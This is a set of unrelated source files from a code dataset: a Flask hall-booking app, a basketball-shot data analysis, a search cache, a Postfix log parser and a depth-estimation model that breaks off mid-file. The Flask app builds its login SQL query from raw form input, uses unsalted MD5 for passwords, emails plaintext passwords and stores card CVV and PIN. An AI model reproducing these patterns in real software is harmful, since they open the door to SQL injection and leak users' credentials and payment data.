data[0]\n return home()\n\n\n@app.route('/userlogin', methods=['POST'])\ndef do_user_login():\n email = request.form['email']\n p = request.form['password']\n password = hashlib.md5(p.encode()).hexdigest()\n cur.execute(\"SELECT * from users where email = '\" + email + \"' and pass='\" + password + \"'\")\n data = cur.fetchone()\n if data is None:\n flash('wrong credentials!')\n return dash()\n else:\n session['logged_in'] = True\n session['username'] = data[1]\n session['email'] = data[3]\n session['phone'] = data[4]\n session['id'] = data[0]\n return home()\n\n\n# Registering New User\n@app.route('/userregister', methods=['POST'])\ndef userregister():\n if session.get('logged_in'):\n return home()\n if request.method == \"POST\":\n name = request.form['username']\n p = request.form['password']\n password = hashlib.md5(p.encode()).hexdigest()\n email = request.form['email']\n phone = request.form['phone']\n cur.execute(\"INSERT INTO users ( name, pass, email, ph) VALUES (%s, %s, %s, %s)\",\n (name, password, email, phone))\n flash(\" user Registered Successfully\")\n db.commit()\n format_list = [name, email, p]\n msg = Message('Welcome to CONFO', sender='rboy36901@gmail.com', recipients=[email])\n msg.body = \"Hello {}, your email is '{}' and pass is '{}'. Thanks for joining us :)\".format(*format_list)\n mail.send(msg)\n return redirect(url_for('dash'))\n\n\n# Updating User\n@app.route('/edituser')\ndef edituser():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n cur.execute(\"SELECT * FROM admin\")\n data = cur.fetchall()\n return render_template('admin/updateadmin.html', applications=data)\n cur.execute(\"SELECT * FROM users where uid=%s\", (session['id']))\n data = cur.fetchall()\n return render_template('user/updateuser.html', applications=data)\n\n\n@app.route('/updateaccount', methods=['POST', 'GET'])\ndef updateaccount():\n if not session.get('logged_in'):\n return render_template('index.html')\n if request.method == 'POST':\n id_data = session['id']\n p = request.form['password']\n password = hashlib.md5(p.encode()).hexdigest()\n name = request.form['name']\n email = request.form['email']\n phone = request.form['phone']\n if session.get('username') == 'admin':\n cur.execute(\"\"\"\n UPDATE admin\n SET pass=%s, email=%s, ph=%s\n WHERE aid=%s\n \"\"\", (password, email, phone, id_data))\n db.commit()\n session['logged_in'] = False\n return redirect(url_for('index'))\n else:\n cur.execute(\"\"\"\n UPDATE users\n SET name=%s, pass=%s, email=%s, ph=%s\n WHERE uid=%s\n \"\"\", (name, password, email, phone, id_data))\n # flash(\"Data Updated Successfully\")\n format_list = [name, email, p, phone]\n msg = Message('Update from CONFO', sender='rboy36901@gmail.com', recipients=[email])\n msg.body = \"Hello {}, your email is '{}' and pass is '{}' and phone number is {} :)\".format(*format_list)\n mail.send(msg)\n db.commit()\n session['logged_in'] = False\n return redirect(url_for('index'))\n\n\n# Delete User account\n@app.route('/remove/', methods=['GET'])\ndef remove(id_data):\n if not session.get('logged_in'):\n return render_template('index.html')\n cur.execute(\"DELETE FROM users WHERE uid=%s\", (id_data))\n db.commit()\n session['logged_in'] = False\n session.clear()\n return redirect(url_for('index'))\n\n\n# Logging out\n@app.route(\"/logout\")\ndef logout():\n session['logged_in'] = False\n session.clear()\n return home()\n\n\n# Dashboard\n@app.route('/index')\ndef index():\n if not session.get('logged_in'):\n return redirect('/')\n if session.get('username') == 'admin':\n cur.execute(\n \"SELECT name,paydate,email,hname,comment,accepted,bid,datet,paid FROM booking b,users u, hall h,payment p where b.bid = p.pid and b.uid = p.uid and b.hid = p.hid and b.hid = h.hid and b.uid = u.uid \")\n data = cur.fetchall()\n return render_template('admin/index.html', applications=data)\n cur.execute(\n \"SELECT name,paydate,email,hname,comment,accepted,bid,datet,paid FROM booking b,users u, hall h,payment p where b.bid = p.pid and b.uid = p.uid and b.hid = p.hid and b.hid = h.hid and b.uid = u.uid and b.uid=%s\",\n (session['id']))\n data = cur.fetchall()\n return render_template('user/index.html', applications=data)\n\n\n# Adding | Deleting | Updating Halls\n@app.route('/addhall')\ndef addhall():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n return render_template('admin/addhall.html')\n\n\n@app.route('/halls')\ndef halls():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n cur.execute(\"SELECT * from hall ORDER BY capacity\")\n data = cur.fetchall()\n return render_template('admin/halls.html', result=data)\n\n\n@app.route('/hallinsert', methods=['POST'])\ndef hallinsert():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n if request.method == \"POST\":\n hname = request.form['hname']\n facility = request.form['facility']\n capacity = request.form['capacity']\n description = request.form['description']\n price = request.form['price']\n cur.execute(\"INSERT INTO hall (hname, facility, capacity, description, price) VALUES (%s, %s, %s, %s, %s)\",\n (hname, facility, capacity, description, price))\n # flash(\"hall Inserted Successfully\")\n db.commit()\n return redirect(url_for('halls'))\n\n\n@app.route('/deletehall/', methods=['GET'])\ndef deletehall(id_data):\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n # flash(\"Record Has Been Deleted Successfully\")\n cur.execute(\"DELETE FROM hall WHERE hid=%s\", (id_data))\n db.commit()\n return redirect(url_for('halls'))\n\n\n@app.route('/hallupdate', methods=['POST', 'GET'])\ndef hallupdate():\n if not session.get('logged_in'):\n return render_template('index.html')\n if request.method == 'POST':\n id_data = request.form['id_data']\n name = request.form['name']\n facility = request.form['facility']\n capacity = request.form['capacity']\n description = request.form['description']\n price = request.form['price']\n cur.execute(\"\"\"\n UPDATE hall\n SET hname=%s, facility=%s, capacity=%s, description=%s, price=%s\n WHERE hid=%s\n \"\"\", (name, facility, capacity, description, price, id_data))\n # flash(\"Data Updated Successfully\")\n db.commit()\n return redirect(url_for('halls'))\n\n\n# Apply for a hall\n@app.route('/apply')\ndef apply():\n if not session.get('logged_in'):\n return render_template('index.html')\n cur.execute(\"SELECT * FROM hall\")\n data = cur.fetchall()\n return render_template('user/apply.html', result=data)\n\n\n# Booking Hall\n@app.route('/insert', methods=['POST'])\ndef insert():\n if not session.get('logged_in'):\n return render_template('index.html')\n if request.method == \"POST\":\n datef = request.form['datef']\n datet = request.form['datet']\n hall = request.form['hall']\n comment = request.form['comment']\n cur.execute(\n \"INSERT INTO booking (uid, datef, datet, hid, comment,accepted) VALUES (%s, %s, %s, %s, %s, %s)\",\n (session['id'], datef, datet, hall, comment, 0,))\n # flash(\"Data Inserted Successfully\")\n db.commit()\n format_list = [session['username'], datef, datet, comment]\n msg = Message('CONFO: Booking Confirmation', sender='rboy36901@gmail.com', recipients=[session['email']])\n msg.body = \"Hello {}, Your booking has been recorded. dated from {} to {}, for {} :)\".format(*format_list)\n mail.send(msg)\n return redirect(url_for('index'))\n\n\n@app.route('/delete/', methods=['GET'])\ndef delete(id_data):\n if not session.get('logged_in'):\n return render_template('index.html')\n # flash(\"Record Has Been Deleted Successfully\")\n cur.execute(\"DELETE FROM booking WHERE bid=%s\", (id_data))\n db.commit()\n return redirect(url_for('index'))\n\n\n@app.route('/update', methods=['POST', 'GET'])\ndef update():\n if not session.get('logged_in'):\n return render_template('index.html')\n if request.method == 'POST':\n id_data = request.form['id_data']\n #datef = request.form['datef']\n #datet = request.form['datet']\n comment = request.form['comment']\n cur.execute(\"\"\"\n UPDATE booking\n SET comment=%s\n WHERE bid=%s\n \"\"\", (comment, id_data))\n # flash(\"Data Updated Successfully\")\n db.commit()\n return redirect(url_for('index'))\n\n\n# Payment for the Booking\n@app.route('/pay', methods=['POST'])\ndef pay():\n if not session.get('logged_in'):\n return render_template('index.html')\n if request.method == 'POST':\n id_data = request.form['id_data']\n ac = request.form['ac']\n cvv = request.form['cvv']\n pin = request.form['pin']\n cur.execute(\"UPDATE payment set paid = %s, paydate = now(), ac=%s, cvv=%s, pin=%s where pid = %s and uid = %s\",\n (1, ac, cvv, pin, id_data, session['id']))\n db.commit()\n return redirect(url_for('index'))\n\n\n@app.route('/payment/', methods=['GET'])\ndef payment(id_data):\n if not session.get('logged_in'):\n return render_template('index.html')\n else:\n cur.execute(\n \"SELECT name,DATEDIFF ( datet ,datef )+1,email,hname,comment,h.price,b.bid FROM booking b,users u, hall h where b.hid = h.hid and b.uid = u.uid and b.uid=%s and b.bid=%s\",\n (session['id'], id_data))\n data = cur.fetchall()\n return render_template('user/payment.html', result=data)\n\n\n@app.route('/paymentdetails/', methods=['GET'])\ndef paymentdetails(id_data):\n if not session.get('logged_in'):\n return render_template('index.html')\n else:\n cur.execute(\n \"select name,email,ph,h.hname,h.price,paydate,comment,ac,DATEDIFF ( datet ,datef )+1 FROM booking b,users u, hall h,payment p where b.bid = p.pid and b.uid = p.uid and b.hid = p.hid and b.hid = h.hid and b.uid = u.uid and b.uid=%s and b.bid=%s\",\n (session['id'], id_data))\n data = cur.fetchall()\n return render_template('user/paymentdetails.html', result=data)\n\n\n@app.route('/backup/')\ndef backup():\n if not session.get('logged_in'):\n return render_template('index.html')\n if session.get('username') == 'admin':\n cur.execute(\"call backup()\")\n data = cur.fetchall()\n return render_template('admin/backup.html', result=data)\n\n\n# Handeling HTTP errors\n@app.errorhandler(400)\ndef bad_request(error):\n return render_template('errors/400.html', title='Bad Request'), 400\n\n\n@app.errorhandler(403)\ndef forbidden(error):\n return render_template('errors/403.html', title='Forbidden'), 403\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template('errors/404.html', title='Page Not Found'), 404\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return render_template('errors/500.html', title='Server Error'), 500\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"debajyotiguha11/Confo","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":19178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9261308228","text":"\nimport pandas as pd\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport scipy as stats\nfrom matplotlib import rc\nimport missingno as mano\n\nplt.style.use(\"ggplot\")\nmpl.rcParams[\"axes.unicode_minus\"] = False\n\n# data load\n\nimport read_data\n\n# 콘솔창 출력 column 확대\npd.set_option('display.max_columns', None)\n\ndata = read_data.read_csv(\"C:/Users/whcl3/PycharmProjects/DataScience/Kaggle/kobe/Input/data.csv\")\n\n# datatype -> category, object (메모리 절약 이점)\n\ndata['action_type'] = data['action_type'].astype('object')\ndata['combined_shot_type'] = data['combined_shot_type'].astype('category')\ndata['game_event_id'] = data['game_event_id'].astype('category')\ndata['game_id'] = data['game_id'].astype('category')\ndata['period'] = data['period'].astype('object')\ndata['playoffs'] = data['playoffs'].astype('category')\ndata['season'] = data['season'].astype('category')\ndata['shot_made_flag'] = data['shot_made_flag'].astype('category')\ndata['shot_type'] = data['shot_type'].astype('category')\ndata['team_id'] = data['team_id'].astype('category')\n\n\ndata.set_index(\"shot_id\", inplace = True)\n\n# print(data.describe(include = ['number']))\n# print(data.describe(include = ['category', 'object']))\n\ntrain = data.dropna(how = 'any')\n\ndef bar_chart(train, feature, ax):\n success = train[train['shot_made_flag']==1][feature].value_counts()\n fail = train[train['shot_made_flag']==0][feature].value_counts()\n df = pd.DataFrame([success, fail])\n df.index = ['Success', 'Fail']\n df.plot(kind='bar', stacked=True, ax=ax)\n\nbar_chart(train, 'shot_made_flag', plt.axes())\nprint(plt.show())\n\nprint(train['shot_made_flag'].value_counts()/len(train.index))\n\n# sns.pairplot(train, vars = ['loc_x', 'loc_y', 'lat', 'lon', 'shot_distance'], hue = \"shot_made_flag\", size=3)\n# print(plt.show())\n\ndef count_plot(column, ax):\n sns.countplot(x= column, hue = \"shot_made_flag\", data = train, ax = ax)\n\nf, axrr = plt.subplots(8, figsize = (15, 30))\n\ncategorical_data = [\"combined_shot_type\", \"season\",\"period\", \"playoffs\", \"shot_type\", \"shot_zone_area\",\n \"shot_zone_basic\", \"shot_zone_range\"]\n\nfor idx, category_data in enumerate(categorical_data, 0):\n count_plot(category_data, axrr[idx])\n axrr[idx].set_title(category_data)\n\nplt.tight_layout()\nplt.show()\n\ndef print_probability(colum):\n print(train[train[\"shot_made_flag\"] == 1][colum].value_counts() / (train[train[\"shot_made_flag\"] == 1][colum].value_counts() + train[train[\"shot_made_flag\"] == 0][colum].value_counts()))\n\nfor category_data in categorical_data:\n print_probability(category_data)\n\ndef draw_facetgrid(feature):\n facet = sns.FacetGrid(train, hue = \"shot_made_flag\", aspect=5)\n facet.map(sns.kdeplot, feature, shade = True)\n facet.set(xlim = (0, train[feature].max()))\n facet.add_legend()\n plt.show()\n\ndraw_facetgrid('minutes_remaining')\ndraw_facetgrid('seconds_remaining')\n\ntrain['shot_made_flag'] = train[\"shot_made_flag\"].astype('int64')\nprint(train.groupby(['season', 'combined_shot_type'])['shot_made_flag'].sum()/train.groupby(['season', 'combined_shot_type'])['shot_made_flag'].count())\n\ndata_cp = data.copy()\ntarget = data_cp['shot_made_flag'].copy()\n\ndata_cp.drop('team_id', axis = 1, inplace =True)\ndata_cp.drop('team_name', axis = 1, inplace =True)\ndata_cp.drop('lat', axis = 1, inplace =True)\ndata_cp.drop('lon', axis = 1, inplace =True)\ndata_cp.drop('game_id', axis = 1, inplace =True)\ndata_cp.drop('game_event_id', axis = 1, inplace =True)\ndata_cp.drop('shot_made_flag', axis = 1, inplace =True)\n\ndata_cp['seconds_from_period_end'] = 60 * data_cp['minutes_remaining'] + data_cp['seconds_remaining']\n\ndata_cp['last_5_sec_in_period'] = data_cp['seconds_from_period_end'] < 5\n\ndata_cp.drop('seconds_from_period_end', axis = 1, inplace =True)\ndata_cp.drop('minutes_remaining', axis = 1, inplace =True)\ndata_cp.drop('seconds_remaining', axis = 1, inplace =True)\n\ndata_cp[\"home_away\"] = data_cp['matchup'].str.contains('vs').astype('int')\ndata_cp.drop('matchup', axis = 1, inplace =True)\n\ndata_cp['game_date'] = pd.to_datetime(data_cp['game_date'])\ndata_cp['game_year'] = data_cp['game_date'].dt.year\ndata_cp['game_month'] = data_cp['game_date'].dt.month\n\ndata_cp.drop('game_date', axis = 1, inplace =True)\n\n# loc_X, loc_y\n\ndata_cp['loc_x'] = pd.cut(data_cp['loc_x'], 25)\ndata_cp['loc_y'] = pd.cut(data_cp['loc_y'], 25)\n\nrare_action_types = data_cp['action_type'].value_counts().sort_values().index.values[:20]\ndata_cp.loc[data_cp['action_type'].isin(rare_action_types), 'action_type'] = 'Other'\n\ncategorical_col = ['action_type', 'combined_shot_type', 'period', 'season', 'shot_type',\n 'shot_zone_area', 'shot_zone_basic', 'shot_zone_range', 'game_year',\n 'game_month', 'opponent', 'loc_x', 'loc_y' ]\n\nfor column in categorical_col:\n dummies = pd.get_dummies(data_cp[column])\n dummies = dummies.add_prefix(\"{}#\".format(column))\n data_cp.drop(column, axis = 1, inplace = True)\n data_cp = data_cp.join(dummies)\n\nunknown_mask = data[\"shot_made_flag\"].isnull()\n\nY = target[-unknown_mask]\nX = data_cp[-unknown_mask]\n\nfrom sklearn.feature_selection import VarianceThreshold\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.decomposition import PCA\n\nthreshold = 0.90\nvt = VarianceThreshold().fit(X)\n# Find feature names\nfeat_var_threshold = data_cp.columns[vt.variances_ > threshold * (1-threshold)]\nprint(feat_var_threshold)\n\nmodel = RandomForestClassifier()\nmodel.fit(X, Y)\nfeature_imp = pd.DataFrame(model.feature_importances_, index=X.columns, columns=[\"importance\"])\nfeat_imp_20 = feature_imp.sort_values(\"importance\", ascending=False).head(20).index\nprint(feat_imp_20)\n\nfeatrues = np.hstack([feat_var_threshold, feat_imp_20])\nfeatrues = np.unique(featrues)\n\nprint(featrues)\n\nprint(X.shape)\n\ncomponents = 8\npca = PCA(n_components=components).fit(X)\npca_variance_explained_df= pd.DataFrame(\n { \"component\": np.arange(1, components+1), \"variance_explained\": pca.explained_variance_ratio_ })\nax = sns.barplot(x='component', y='variance_explained', data=pca_variance_explained_df)\nax.set_title(\"PCA - Variance explained\")\n\nplt.show()\n\n\n","repo_name":"ChiHyeongCho/DataScience","sub_path":"Kaggle/kobe/feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74837893925","text":"\"\"\" Cache search results to reduce API usage \"\"\"\nimport datetime as dt\n\nfrom disco_dan import db\nfrom disco_dan.cache.models import YoutubeQuery\n\n\nclass SearchCache(object):\n \"\"\" A cache of search results \"\"\"\n\n # pylint: disable=no-member\n\n def __init__(self, duration: dt.timedelta = dt.timedelta(days=90), Session=None):\n self.duration = duration\n if Session is None:\n self.Session = db.Session\n else:\n self.Session = Session\n\n async def check_text(self, query_text) -> YoutubeQuery:\n \"\"\" Retrieve an entry from db \"\"\"\n session = self.Session()\n cache_limit = dt.datetime.now() - self.duration\n matches = (\n session.query(YoutubeQuery)\n .filter(YoutubeQuery.query_text == query_text)\n .filter(YoutubeQuery.youtube_id is not None)\n .order_by(YoutubeQuery.created_at.desc())\n .filter(YoutubeQuery.created_at > cache_limit)\n )\n if matches.first():\n return matches.first()\n\n # failed and didn't find any matches\n return None\n\n async def add_result(\n self, youtube_id: str, query_text: str, url: str\n ) -> YoutubeQuery:\n \"\"\" Add a new cache entry for `query_text` \"\"\"\n session = self.Session()\n entry = YoutubeQuery(\n query_text=query_text,\n youtube_id=youtube_id,\n url=url,\n created_at=dt.datetime.now(),\n )\n session.add(entry)\n session.commit()\n return entry\n\n def flush(self, expired_only: bool = True):\n \"\"\" Flush this cache \"\"\"\n session = self.Session()\n flush_rows = session.query(YoutubeQuery)\n if expired_only:\n cache_limit = dt.datetime.now() - self.duration\n flush_rows = flush_rows.filter(YoutubeQuery.created_at < cache_limit)\n flush_rows.delete()\n session.commit()\n\n async def async_flush(self, *args, **kwargs):\n \"\"\" Like flush, but async! \"\"\"\n return self.flush(*args, **kwargs)\n","repo_name":"stephen1000/disco_dan","sub_path":"src/disco_dan/cache/search_cache.py","file_name":"search_cache.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14342535222","text":"from __future__ import absolute_import\n\nfrom .uuid_helper import UUIDs\n\n\n# TO-DO: implement handle_pickup()\nclass StateMachine(object):\n messages = {}\n deliveries_by_id = {} # Mapping of message-id to { : {}}\n uuid_queue = UUIDs()\n uuid_owners = {} # Mapping of fake msg_id string to username string\n\n\n def __init__(self, target_rcpt, discard_threshold, ip_re, logger):\n self.target_rcpt = target_rcpt\n self.discard_threshold = discard_threshold\n self.ip_re = ip_re\n self.log = logger\n\n\n def dispatch(self, label, match_groups, line_num):\n method_name = 'handle_{0}'.format(label) \n return getattr(self, method_name)(match_groups, line_num)\n\n\n def handle_connect(self, match_groups, line_num):\n dt, smtpd_pid, host, ip = match_groups\n self.log.debug(ip)\n\n\n def handle_client(self, match_groups, line_num):\n dt, smtpd_pid, queue_id, host, ip = match_groups\n self.log.debug(queue_id)\n if self.ip_re is None or not self.ip_re.match(ip):\n self.messages[queue_id] = {'dt': dt, 'ip': ip, 'msg_id_faked': False,\n 'duplicate_msg_id': False, 'blessed': False}\n\n\n def handle_disconnect(self, match_groups, line_num):\n dt, smtpd_pid, host, ip = match_groups\n\n\n def handle_cleanup(self, match_groups, line_num):\n\n # E.g. \"... postfix/cleanup[44462]: EBA07667720: message-id=<1533884753792.b2c522e5-18f2-4b30-bd0d-1a622ab63539@notify.sendle.com>\"\n dt, cleanup_pid, queue_id, msg_id = match_groups\n self.log.debug(queue_id)\n\n if queue_id in self.messages:\n if not msg_id:\n # For messages without an ID (\"message-id=<>\"), push onto onto the\n # front of the queue, i.e. last in, first out order; this is done\n # even if ignoring this message, to keep pushes and pops balanced.\n msg_id = self.uuid_queue.create()\n self.messages[queue_id]['msg_id_faked'] = True\n self.log.debug(\"cleanup pushing id: %s\", msg_id)\n\n self.messages[queue_id]['to'] = []\n self.messages[queue_id]['msg_id'] = msg_id\n if msg_id in self.deliveries_by_id:\n # It's a duplicate\n ## self.messages[queue_id]['msg_id_count'] += 1\n pass\n else:\n # Normal case\n self.deliveries_by_id[msg_id] = {}\n ## self.messages[queue_id]['deliveries'] = {}\n\n\n def handle_envfrom(self, match_groups, line_num):\n dt, qmgr_pid, queue_id, envfrom, num_rcpt = match_groups\n if queue_id in self.messages:\n self.log.debug(envfrom)\n self.messages[queue_id]['envfrom'] = envfrom\n\n\n def handle_result(self, match_groups, line_num):\n \"\"\"Handle a spamd result line with the message score, tags and\n properties.\"\"\"\n\n dt, spamd_pid, int_score, tags, user, msg_id = match_groups\n uuid_del = False # Do we need to clean up the queue or save for handle_local()?\n\n if not msg_id:\n # For messages without an ID (\"mid=(unknown)\"), get the first one\n # from the queue, i.e. last in, first out order; hunt for the\n # correct fake msg_id in the queue unless the message was delivered\n # to multiple recipients\n msg_id = self.uuid_queue.peek()\n if user != 'spamass-milter':\n # Check for the case where this is a \"new\" UUID\n if msg_id not in self.uuid_owners or \\\n self.uuid_owners[msg_id] != user:\n # Cycle through UUIDs to find the first un-owned one and claim it\n queue_index = 0\n while msg_id in self.uuid_owners:\n queue_index += 1\n msg_id = self.uuid_queue.peek(queue_index)\n self.uuid_owners[msg_id] = user\n\n uuid_del = True\n\n self.log.debug(\"result id: %s\", msg_id)\n\n # Note: queue_id is not unique per message-id, so only store info per message-id\n if msg_id in self.deliveries_by_id:\n self.log.debug(\"score is %d (%s)\", int(int_score), user)\n self.record_delivery(msg_id, user, int(int_score))\n\n\n def handle_lda(self, match_groups, line_num):\n dt, user, msg_id_a, msg_id_b, mailbox = match_groups\n\n msg_id = msg_id_a if msg_id_a else msg_id_b\n\n if not msg_id:\n # For messages without an ID (\"msgid=unspecified\"), look at the first one\n # on the queue, i.e. last in, first out order\n if self.uuid_queue.empty():\n return\n msg_id = self.uuid_queue.peek()\n\n if msg_id in self.deliveries_by_id:\n # Note: queue_id is not unique per message-id, so only store info per message-id\n ## queue_id = self.deliveries_by_id[msg_id]\n # Record the delivery, with a spam score if available\n if user in self.deliveries_by_id[msg_id]:\n self.deliveries_by_id[msg_id][user]['mailbox'] = mailbox\n self.deliveries_by_id[msg_id][user]['count'] += 1\n else:\n self.record_delivery(msg_id, user, None, mailbox)\n else:\n self.log.debug(\"Ignoring LDA for %s\", msg_id)\n\n\n def record_delivery(self, msg_id, user, int_score=None, mailbox=None):\n self.deliveries_by_id[msg_id][user] = { 'int_score': int_score, 'user':\n user, 'count': 1 }\n if mailbox:\n self.deliveries_by_id[msg_id][user]['mailbox'] = mailbox\n\n\n def handle_local(self, match_groups, line_num):\n dt, local_pid, queue_id, rcpt, envto = match_groups\n if queue_id in self.messages:\n ## if envto:\n ## print(line_num, file=sys.stderr)\n parts = rcpt.lower().split(\"@\")\n self.messages[queue_id]['to'].append((rcpt, envto, parts[0]))\n self.messages[queue_id]['blessed'] = self.target_rcpt in (None, rcpt, envto)\n\n\n def handle_removed(self, match_groups, line_num):\n dt, qmgr_pid, queue_id = match_groups\n self.log.debug(queue_id + \" deleted\")\n if queue_id in self.messages:\n msg_id = self.messages[queue_id]['msg_id']\n if 'envfrom' not in self.messages[queue_id]:\n # Bounce message\n self.messages[queue_id]['envfrom'] = \"\"\n default_score = None\n max_int_score = -1000\n if msg_id in self.deliveries_by_id:\n for username in self.deliveries_by_id[msg_id]:\n delivery = self.deliveries_by_id[msg_id][username]\n if max_int_score < delivery['int_score']:\n max_int_score = delivery['int_score']\n if 'mailbox' not in delivery:\n default_score = delivery['int_score']\n\n if (self.discard_threshold is None or \\\n max_int_score < self.discard_threshold) and \\\n self.messages[queue_id]['blessed']:\n self.print_info(queue_id, default_score)\n else:\n self.log.debug(\"X %s\", queue_id)\n if msg_id in self.deliveries_by_id:\n del self.deliveries_by_id[msg_id]\n\n if self.messages[queue_id]['msg_id_faked']:\n fake_msg_id = self.uuid_queue.pop(msg_id)\n assert fake_msg_id == msg_id\n self.log.debug(\"handle_removed() popping id; %d left\", len(self.uuid_queue.uuids))\n self.log.debug(\"uuid_owners: %s\", self.uuid_owners)\n if msg_id in self.uuid_owners:\n # This is only present when the username is not \"spamass-milter\"\n del self.uuid_owners[msg_id]\n del self.messages[queue_id]\n\n\n def print_info(self, queue_id, default_score):\n msg_id = self.messages[queue_id]['msg_id']\n m = self.messages[queue_id]\n print(queue_id + \": ({dt}) {envfrom} [{ip}]\\n ({msg_id})\".format(**m))\n # Note: each delivery is not currently tied to a recipient\n for rcpt, envto, username in m['to']:\n if envto:\n print(\" {0} = {1}\".format(rcpt, envto))\n else:\n print(\" {0}\".format(rcpt))\n if msg_id in self.deliveries_by_id and username in self.deliveries_by_id[msg_id]:\n delivery = self.deliveries_by_id[msg_id][username]\n if delivery['int_score'] is None:\n delivery['int_score'] = default_score\n fields = {'mailbox': \"(none)\"}\n fields.update(delivery)\n print(\" ...{user}: saved to '{mailbox}', spam level {int_score}\".format(**fields))\n print(\"\")\n\n\n def handle_rejected(self, match_groups, line_num):\n dt, cleanup_pid, queue_id = match_groups\n\n if queue_id in self.messages:\n msg_id = self.messages[queue_id]['msg_id']\n if self.messages[queue_id]['msg_id_faked']:\n self.uuid_queue.pop()\n\n\n def cleanup(self):\n self.log.debug(\"zombie messages: %d; zombie message IDs: %d\",\n len(self.messages), len(self.deliveries_by_id))\n","repo_name":"unixnut/Postfix-tools","sub_path":"postscan/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":9365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33849731955","text":"from __future__ import division\r\nfrom __future__ import print_function\r\nimport math\r\nimport utils\r\nimport paddle\r\nimport paddle.nn as nn\r\nfrom paddle.vision.models.resnet import resnet50\r\n# from paddle.utils.download import get_weights_path_from_url\r\nfrom paddle.vision.models.resnet import BottleneckBlock\r\n__all__ = []\r\n\r\n\r\nclass UnPoolAsConv(nn.Layer):\r\n\r\n def __init__(self, in_channels, out_channels, batch_size):\r\n super(UnPoolAsConv, self).__init__()\r\n self.batch_size = batch_size\r\n\r\n # Convolution A (3x3)\r\n self.convA = nn.Conv2D(in_channels, out_channels, 3, padding='SAME')\r\n # Convolution B (2x3)\r\n self.convB = nn.Conv2D(in_channels, out_channels, (2, 3), padding='SAME')\r\n # Convolution C (3x2)\r\n self.convC = nn.Conv2D(in_channels, out_channels, (3, 2), padding='SAME')\r\n # Convolution D (2x2)\r\n self.convD = nn.Conv2D(in_channels, out_channels, 2, padding='SAME')\r\n\r\n def forward(self, input_data):\r\n # xA = input_data\r\n # outputA = self.convA(xA)\r\n # xB = nn.functional.pad(input_data, [1, 1, 0, 1])\r\n # outputB = self.convB(xB)\r\n # xC = nn.functional.pad(input_data, [0, 1, 1, 1])\r\n # outputC = self.convC(xC)\r\n # xD = nn.functional.pad(input_data, [0, 1, 0, 1])\r\n # outputD = self.convD(xD)\r\n\r\n outputA = self.convA(input_data)\r\n outputB = self.convB(input_data)\r\n outputC = self.convC(input_data)\r\n outputD = self.convD(input_data)\r\n\r\n # Interleaving elements of the four feature maps\r\n # --------------------------------------------------\r\n left = utils.interleave([outputA, outputB], axis=2) # columns\r\n right = utils.interleave([outputC, outputD], axis=2) # columns\r\n out = utils.interleave([left, right], axis=3) # rows\r\n\r\n return out\r\n\r\n\r\nclass UpProject(nn.Layer):\r\n\r\n def __init__(self, in_channels, out_channels, batch_size):\r\n super(UpProject, self).__init__()\r\n self.batch_size = batch_size\r\n\r\n # branch 1\r\n self.unPool1 = UnPoolAsConv(in_channels, out_channels, batch_size)\r\n self.bn1_1 = nn.BatchNorm2D(out_channels)\r\n self.relu1_1 = nn.ReLU()\r\n self.conv1 = nn.Conv2D(out_channels, out_channels, 3, padding='SAME')\r\n self.bn1_2 = nn.BatchNorm2D(out_channels)\r\n\r\n # branch 2\r\n self.unPool2 = UnPoolAsConv(in_channels, out_channels, batch_size)\r\n self.bn2_1 = nn.BatchNorm2D(out_channels)\r\n\r\n self.relu = nn.ReLU()\r\n\r\n def forward(self, input_data):\r\n out1 = self.unPool1(input_data)\r\n out1 = self.bn1_1(out1)\r\n out1 = self.relu1_1(out1)\r\n out1 = self.conv1(out1)\r\n out1 = self.bn1_2(out1)\r\n\r\n out2 = self.unPool2(input_data)\r\n out2 = self.bn2_1(out2)\r\n\r\n out = out1 + out2\r\n out = self.relu(out)\r\n\r\n return out\r\n\r\n\r\nclass FCRN(nn.Layer):\r\n\r\n def __init__(self, batch_size):\r\n super(FCRN, self).__init__()\r\n self.inplanes = 64\r\n self.batch_size = batch_size\r\n # b, 304, 228, 3\r\n # ImageNet dataset Pretrianed ResNet without avrgpool & fc\r\n self.resNet50 = resnet50(pretrained=True, num_classes=0, with_pool=False)\r\n\r\n # Up-Conv layers\r\n self.conv1 = nn.Conv2D(2048, 1024, kernel_size=1, bias_attr=False) # b, 10, 8, 1024\r\n self.bn1 = nn.BatchNorm2D(1024)\r\n\r\n self.up1 = self._make_upproj_layer(UpProject, 1024, 512, self.batch_size)\r\n self.up2 = self._make_upproj_layer(UpProject, 512, 256, self.batch_size)\r\n self.up3 = self._make_upproj_layer(UpProject, 256, 128, self.batch_size)\r\n self.up4 = self._make_upproj_layer(UpProject, 128, 64, self.batch_size)\r\n\r\n self.drop = nn.Dropout2D()\r\n\r\n self.conv2 = nn.Conv2D(64, 1, 3, padding='SAME')\r\n\r\n self.relu = nn.ReLU()\r\n\r\n self.upsample = nn.Upsample((304, 228), mode='bilinear')\r\n\r\n # initialize\r\n initialize = False\r\n if initialize:\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2D):\r\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\r\n m.weight.data.normal_(0, math.sqrt(2. / n))\r\n elif isinstance(m, nn.BatchNorm2D):\r\n m.weight.data.fill_(1)\r\n m.bias.data.zero_()\r\n\r\n def 